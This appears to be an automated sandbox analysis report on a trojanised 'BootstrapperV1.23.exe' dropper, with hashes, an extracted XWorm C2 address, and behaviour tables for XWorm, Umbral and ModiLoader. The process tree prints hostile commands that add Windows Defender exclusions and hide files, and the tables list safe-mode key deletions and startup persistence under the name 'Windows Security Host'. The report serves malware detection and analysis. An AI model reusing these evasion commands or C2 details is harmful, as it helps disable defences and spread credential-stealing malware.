Analysis
-
max time kernel
143s -
max time network
149s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
14-11-2024 18:14
Static task
static1
Behavioral task
behavioral1
Sample
BootstrapperV1.23.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
BootstrapperV1.23.exe
Resource
win11-20241007-en
General
-
Target
BootstrapperV1.23.exe
-
Size
800KB
-
MD5
7198fa10a50ea9aaf6ae5c2a05af2104
-
SHA1
c35a2a73313e3c5ad08136e3bc583bb9bc26964c
-
SHA256
073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce
-
SHA512
56db894671d6b5e093ef2de88ba785f1d9159e2b206593886ad540d336c5dfa79cd5ea7b6b29fbdd39d3a2355bcc01d90f5fff64e97fcbda383e38df79353acf
-
SSDEEP
12288:naMgC/rJdxLDMVVV/1EIEm6l6O6+26AFxKxg0YZbs7Ql:naMgGfxLDmVwoV+26YcY+0
Malware Config
Extracted
xworm
127.0.0.1:26848
23.ip.gl.ply.gg:26848
-
Install_directory
%Userprofile%
-
install_file
Windows Security Host.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x00290000000450e5-7.dat family_umbral behavioral1/memory/5080-28-0x0000025BEFA70000-0x0000025BEFAB0000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x002d0000000450f7-21.dat family_xworm behavioral1/memory/3780-35-0x0000000000970000-0x000000000098A000-memory.dmp family_xworm -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
Umbral family
-
Xworm family
-
ModiLoader Second Stage 2 IoCs
resource yara_rule behavioral1/files/0x00360000000451bb-914.dat modiloader_stage2 behavioral1/memory/1792-1026-0x0000000000400000-0x000000000046A000-memory.dmp modiloader_stage2 -
Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2096 powershell.exe 3904 powershell.exe 2868 powershell.exe 1984 powershell.exe 2824 powershell.exe 3180 powershell.exe 1240 powershell.exe 2908 powershell.exe 3620 powershell.exe 1300 powershell.exe 556 powershell.exe 3604 powershell.exe 8 powershell.exe 3516 powershell.exe 836 powershell.exe 4320 powershell.exe 1000 powershell.exe 3292 powershell.exe 4892 powershell.exe 4000 powershell.exe 3436 powershell.exe 688 powershell.exe 3568 powershell.exe 3100 powershell.exe 2376 powershell.exe 456 powershell.exe 4260 powershell.exe 228 powershell.exe 736 powershell.exe 4472 powershell.exe 3740 powershell.exe 2296 powershell.exe 4000 powershell.exe 2292 powershell.exe 4940 powershell.exe 3332 powershell.exe 3436 powershell.exe 3152 powershell.exe 2828 powershell.exe 2284 powershell.exe 4496 powershell.exe 1204 powershell.exe 2988 powershell.exe 2788 powershell.exe 2332 powershell.exe 3904 powershell.exe 5060 powershell.exe 1776 powershell.exe 2308 powershell.exe 384 powershell.exe 3924 powershell.exe 4908 powershell.exe 1464 powershell.exe 776 powershell.exe 4460 powershell.exe 2588 powershell.exe 4036 powershell.exe 1184 powershell.exe 4652 powershell.exe 1648 powershell.exe 4308 powershell.exe 4652 powershell.exe 3764 powershell.exe 1036 powershell.exe -
Drops file in Drivers directory 15 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Injector.exe -
Checks computer location settings 2 TTPs 59 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation Windows Security Host.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation Windows Security Host.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk Windows Security Host.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk Windows Security Host.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk Windows Security Host.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk Windows Security Host.exe -
Executes dropped EXE 64 IoCs
pid Process 5080 Injector.exe 3780 Windows Security Host.exe 1684 Injector.exe 3004 Windows Security Host.exe 2708 Injector.exe 1460 Windows Security Host.exe 3052 Injector.exe 1028 Windows Security Host.exe 2300 Injector.exe 2984 Windows Security Host.exe 4604 Injector.exe 748 Windows Security Host.exe 2216 Injector.exe 3736 Windows Security Host.exe 2860 Injector.exe 2132 Windows Security Host.exe 3976 Injector.exe 1372 Windows Security Host.exe 4788 Injector.exe 2208 Windows Security Host.exe 1588 Injector.exe 2492 Windows Security Host.exe 4588 Injector.exe 4392 Windows Security Host.exe 1380 Injector.exe 2864 Windows Security Host.exe 2216 Injector.exe 2200 Windows Security Host.exe 1592 Injector.exe 2820 Windows Security Host.exe 4172 Injector.exe 2032 Windows Security Host.exe 4092 Injector.exe 736 Windows Security Host.exe 228 Injector.exe 2040 Windows Security Host.exe 3084 Injector.exe 3856 Windows Security Host.exe 872 Injector.exe 2132 Windows Security Host.exe 3068 Injector.exe 5052 Windows Security Host.exe 3004 Injector.exe 2604 Windows Security Host.exe 4968 Injector.exe 2056 Windows Security Host.exe 1928 Injector.exe 456 Windows Security Host.exe 868 Injector.exe 4492 Windows Security Host.exe 2892 Injector.exe 2944 Windows Security Host.exe 3332 Injector.exe 4200 Windows Security Host.exe 2984 Injector.exe 2492 Windows Security Host.exe 4292 Injector.exe 2988 Windows Security Host.exe 2788 Injector.exe 3900 Windows Security Host.exe 3272 Injector.exe 4092 Windows Security Host.exe 2880 Injector.exe 2372 Windows Security Host.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 7 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power znrubj.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys znrubj.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc znrubj.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend znrubj.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager znrubj.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys znrubj.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc znrubj.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Host = "C:\\Users\\Admin\\Windows Security Host.exe" Windows Security Host.exe Set value (str) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Host = "C:\\Users\\Admin\\Windows Security Host.exe" Windows Security Host.exe Set value (str) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\znrubj.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\znrubj.exe" znrubj.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 30 IoCs
flow ioc 141 discord.com 142 discord.com 164 discord.com 25 discord.com 70 discord.com 114 discord.com 78 discord.com 148 discord.com 24 discord.com 40 discord.com 62 discord.com 157 discord.com 41 discord.com 93 discord.com 124 discord.com 94 discord.com 115 discord.com 163 discord.com 71 discord.com 79 discord.com 149 discord.com 107 discord.com 123 discord.com 132 discord.com 133 discord.com 100 discord.com 101 discord.com 108 discord.com 61 discord.com 156 discord.com -
Looks up external IP address via web service 16 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com 66 ip-api.com 83 ip-api.com 97 ip-api.com 111 ip-api.com 128 ip-api.com 145 ip-api.com 32 ip-api.com 74 ip-api.com 104 ip-api.com 53 ip-api.com 118 ip-api.com 152 ip-api.com 138 ip-api.com 160 ip-api.com 167 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language znrubj.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 30 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1640 PING.EXE 4064 cmd.exe 1984 cmd.exe 1828 cmd.exe 456 PING.EXE 2820 cmd.exe 2804 PING.EXE 3528 cmd.exe 2908 PING.EXE 1672 cmd.exe 4948 PING.EXE 2332 PING.EXE 3584 cmd.exe 324 PING.EXE 2064 cmd.exe 320 PING.EXE 4452 cmd.exe 388 cmd.exe 4476 cmd.exe 1072 PING.EXE 4928 cmd.exe 2908 PING.EXE 4432 cmd.exe 3144 cmd.exe 3244 PING.EXE 4156 PING.EXE 5004 PING.EXE 3748 PING.EXE 1596 cmd.exe 4160 PING.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 1996 timeout.exe -
Detects videocard installed 1 TTPs 15 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3220 wmic.exe 4904 wmic.exe 4052 wmic.exe 4468 wmic.exe 4024 wmic.exe 4952 wmic.exe 2032 wmic.exe 4620 wmic.exe 4244 wmic.exe 3920 wmic.exe 4092 wmic.exe 2908 wmic.exe 4876 wmic.exe 3968 wmic.exe 4312 wmic.exe -
Runs ping.exe 1 TTPs 15 IoCs
pid Process 2908 PING.EXE 5004 PING.EXE 3244 PING.EXE 4156 PING.EXE 320 PING.EXE 4948 PING.EXE 3748 PING.EXE 456 PING.EXE 1640 PING.EXE 2332 PING.EXE 4160 PING.EXE 2804 PING.EXE 324 PING.EXE 2908 PING.EXE 1072 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2916 wmic.exe 2916 wmic.exe 2916 wmic.exe 2916 wmic.exe 5080 Injector.exe 3436 powershell.exe 3436 powershell.exe 556 powershell.exe 556 powershell.exe 3332 powershell.exe 3332 powershell.exe 3604 powershell.exe 3604 powershell.exe 416 powershell.exe 416 powershell.exe 4320 powershell.exe 4320 powershell.exe 3944 powershell.exe 3944 powershell.exe 688 powershell.exe 688 powershell.exe 4636 wmic.exe 4636 wmic.exe 4636 wmic.exe 4636 wmic.exe 396 wmic.exe 396 wmic.exe 396 wmic.exe 396 wmic.exe 1492 wmic.exe 1492 wmic.exe 1492 wmic.exe 1492 wmic.exe 3780 Windows Security Host.exe 2788 powershell.exe 2788 powershell.exe 4904 wmic.exe 4904 wmic.exe 4904 wmic.exe 4904 wmic.exe 2780 wmic.exe 2780 wmic.exe 2780 wmic.exe 2780 wmic.exe 2300 Injector.exe 2300 Injector.exe 2868 powershell.exe 2868 powershell.exe 2868 powershell.exe 3436 powershell.exe 3436 powershell.exe 3436 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 3912 wmic.exe 3912 wmic.exe 3912 wmic.exe 3912 wmic.exe 1028 wmic.exe 1028 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3780 Windows Security Host.exe Token: SeDebugPrivilege 5080 Injector.exe Token: SeIncreaseQuotaPrivilege 2916 wmic.exe Token: SeSecurityPrivilege 2916 wmic.exe Token: SeTakeOwnershipPrivilege 2916 wmic.exe Token: SeLoadDriverPrivilege 2916 wmic.exe Token: SeSystemProfilePrivilege 2916 wmic.exe Token: SeSystemtimePrivilege 2916 wmic.exe Token: SeProfSingleProcessPrivilege 2916 wmic.exe Token: SeIncBasePriorityPrivilege 2916 wmic.exe Token: SeCreatePagefilePrivilege 2916 wmic.exe Token: SeBackupPrivilege 2916 wmic.exe Token: SeRestorePrivilege 2916 wmic.exe Token: SeShutdownPrivilege 2916 wmic.exe Token: SeDebugPrivilege 2916 wmic.exe Token: SeSystemEnvironmentPrivilege 2916 wmic.exe Token: SeRemoteShutdownPrivilege 2916 wmic.exe Token: SeUndockPrivilege 2916 wmic.exe Token: SeManageVolumePrivilege 2916 wmic.exe Token: 33 2916 wmic.exe Token: 34 2916 wmic.exe Token: 35 2916 wmic.exe Token: 36 2916 wmic.exe Token: SeIncreaseQuotaPrivilege 2916 wmic.exe Token: SeSecurityPrivilege 2916 wmic.exe Token: SeTakeOwnershipPrivilege 2916 wmic.exe Token: SeLoadDriverPrivilege 2916 wmic.exe Token: SeSystemProfilePrivilege 2916 wmic.exe Token: SeSystemtimePrivilege 2916 wmic.exe Token: SeProfSingleProcessPrivilege 2916 wmic.exe Token: SeIncBasePriorityPrivilege 2916 wmic.exe Token: SeCreatePagefilePrivilege 2916 wmic.exe Token: SeBackupPrivilege 2916 wmic.exe Token: SeRestorePrivilege 2916 wmic.exe Token: SeShutdownPrivilege 2916 wmic.exe Token: SeDebugPrivilege 2916 wmic.exe Token: SeSystemEnvironmentPrivilege 2916 wmic.exe Token: SeRemoteShutdownPrivilege 2916 wmic.exe Token: SeUndockPrivilege 2916 wmic.exe Token: SeManageVolumePrivilege 2916 wmic.exe Token: 33 2916 wmic.exe Token: 34 2916 wmic.exe Token: 35 2916 wmic.exe Token: 36 2916 wmic.exe Token: SeDebugPrivilege 3004 Windows Security Host.exe Token: SeDebugPrivilege 3436 powershell.exe Token: SeIncreaseQuotaPrivilege 3436 powershell.exe Token: SeSecurityPrivilege 3436 powershell.exe Token: SeTakeOwnershipPrivilege 3436 powershell.exe Token: SeLoadDriverPrivilege 3436 powershell.exe Token: SeSystemProfilePrivilege 3436 powershell.exe Token: SeSystemtimePrivilege 3436 powershell.exe Token: SeProfSingleProcessPrivilege 3436 powershell.exe Token: SeIncBasePriorityPrivilege 3436 powershell.exe Token: SeCreatePagefilePrivilege 3436 powershell.exe Token: SeBackupPrivilege 3436 powershell.exe Token: SeRestorePrivilege 3436 powershell.exe Token: SeShutdownPrivilege 3436 powershell.exe Token: SeDebugPrivilege 3436 powershell.exe Token: SeSystemEnvironmentPrivilege 3436 powershell.exe Token: SeRemoteShutdownPrivilege 3436 powershell.exe Token: SeUndockPrivilege 3436 powershell.exe Token: SeManageVolumePrivilege 3436 powershell.exe Token: 33 3436 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3780 Windows Security Host.exe 3692 Windows Security Host.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1240 wrote to memory of 5080 1240 BootstrapperV1.23.exe 83 PID 1240 wrote to memory of 5080 1240 BootstrapperV1.23.exe 83 PID 1240 wrote to memory of 3780 1240 BootstrapperV1.23.exe 84 PID 1240 wrote to memory of 3780 1240 BootstrapperV1.23.exe 84 PID 1240 wrote to memory of 1424 1240 BootstrapperV1.23.exe 85 PID 1240 wrote to memory of 1424 1240 BootstrapperV1.23.exe 85 PID 5080 wrote to memory of 2916 5080 Injector.exe 86 PID 5080 wrote to memory of 2916 5080 Injector.exe 86 PID 5080 wrote to memory of 1748 5080 Injector.exe 91 PID 5080 wrote to memory of 1748 5080 Injector.exe 91 PID 1424 wrote to memory of 1684 1424 BootstrapperV1.23.exe 93 PID 1424 wrote to memory of 1684 1424 BootstrapperV1.23.exe 93 PID 1424 wrote to memory of 3004 1424 BootstrapperV1.23.exe 94 PID 1424 wrote to memory of 3004 1424 BootstrapperV1.23.exe 94 PID 1424 wrote to memory of 5052 1424 BootstrapperV1.23.exe 95 PID 1424 wrote to memory of 5052 1424 BootstrapperV1.23.exe 95 PID 5080 wrote to memory of 3436 5080 Injector.exe 96 PID 5080 wrote to memory of 3436 5080 Injector.exe 96 PID 3780 wrote to memory of 556 3780 Windows Security Host.exe 99 PID 3780 wrote to memory of 556 3780 Windows Security Host.exe 99 PID 5080 wrote to memory of 3332 5080 Injector.exe 102 PID 5080 wrote to memory of 3332 5080 Injector.exe 102 PID 3780 wrote to memory of 3604 3780 Windows Security Host.exe 104 PID 3780 wrote to memory of 3604 3780 Windows Security Host.exe 104 PID 5080 wrote to memory of 416 5080 Injector.exe 106 PID 5080 wrote to memory of 416 5080 Injector.exe 106 PID 3780 wrote to memory of 4320 3780 Windows Security Host.exe 108 PID 3780 wrote to memory of 4320 3780 Windows Security Host.exe 108 PID 5080 wrote to memory of 3944 5080 Injector.exe 110 PID 5080 wrote to memory of 3944 5080 Injector.exe 110 PID 5052 wrote to memory of 2708 5052 BootstrapperV1.23.exe 112 PID 5052 wrote to memory of 2708 5052 BootstrapperV1.23.exe 112 PID 5052 wrote to memory of 1460 5052 BootstrapperV1.23.exe 152 PID 5052 wrote to memory of 1460 5052 BootstrapperV1.23.exe 152 PID 5052 wrote to memory of 2444 5052 BootstrapperV1.23.exe 114 PID 5052 wrote to memory of 2444 5052 BootstrapperV1.23.exe 114 PID 3780 wrote to memory of 688 3780 Windows Security Host.exe 115 PID 3780 wrote to memory of 688 3780 Windows Security Host.exe 115 PID 5080 wrote to memory of 4636 5080 Injector.exe 117 PID 5080 wrote to memory of 4636 5080 Injector.exe 117 PID 5080 wrote to memory of 396 5080 Injector.exe 120 PID 5080 wrote to memory of 396 5080 Injector.exe 120 PID 5080 wrote to memory of 1492 5080 Injector.exe 122 PID 5080 wrote to memory of 1492 5080 Injector.exe 122 PID 5080 wrote to memory of 2788 5080 Injector.exe 124 PID 5080 wrote to memory of 2788 5080 Injector.exe 124 PID 5080 wrote to memory of 4904 5080 Injector.exe 126 PID 5080 wrote to memory of 4904 5080 Injector.exe 126 PID 2444 wrote to memory of 3052 2444 BootstrapperV1.23.exe 128 PID 2444 wrote to memory of 3052 2444 BootstrapperV1.23.exe 128 PID 2444 wrote to memory of 1028 2444 BootstrapperV1.23.exe 156 PID 2444 wrote to memory of 1028 2444 BootstrapperV1.23.exe 156 PID 2444 wrote to memory of 2244 2444 BootstrapperV1.23.exe 130 PID 2444 wrote to memory of 2244 2444 BootstrapperV1.23.exe 130 PID 5080 wrote to memory of 4928 5080 Injector.exe 131 PID 5080 wrote to memory of 4928 5080 Injector.exe 131 PID 4928 wrote to memory of 2908 4928 cmd.exe 162 PID 4928 wrote to memory of 2908 4928 cmd.exe 162 PID 2244 wrote to memory of 2300 2244 BootstrapperV1.23.exe 136 PID 2244 wrote to memory of 2300 2244 BootstrapperV1.23.exe 136 PID 2244 wrote to memory of 2984 2244 BootstrapperV1.23.exe 137 PID 2244 wrote to memory of 2984 2244 BootstrapperV1.23.exe 137 PID 2244 wrote to memory of 4540 2244 BootstrapperV1.23.exe 138 PID 2244 wrote to memory of 4540 2244 BootstrapperV1.23.exe 138 -
Views/modifies file attributes 1 TTPs 16 IoCs
pid Process 4136 attrib.exe 3084 attrib.exe 4608 attrib.exe 1560 attrib.exe 868 attrib.exe 2804 attrib.exe 844 attrib.exe 1472 attrib.exe 3536 attrib.exe 188 attrib.exe 1036 attrib.exe 696 attrib.exe 1748 attrib.exe 2840 attrib.exe 2596 attrib.exe 320 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"3⤵
- Views/modifies file attributes
PID:1748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
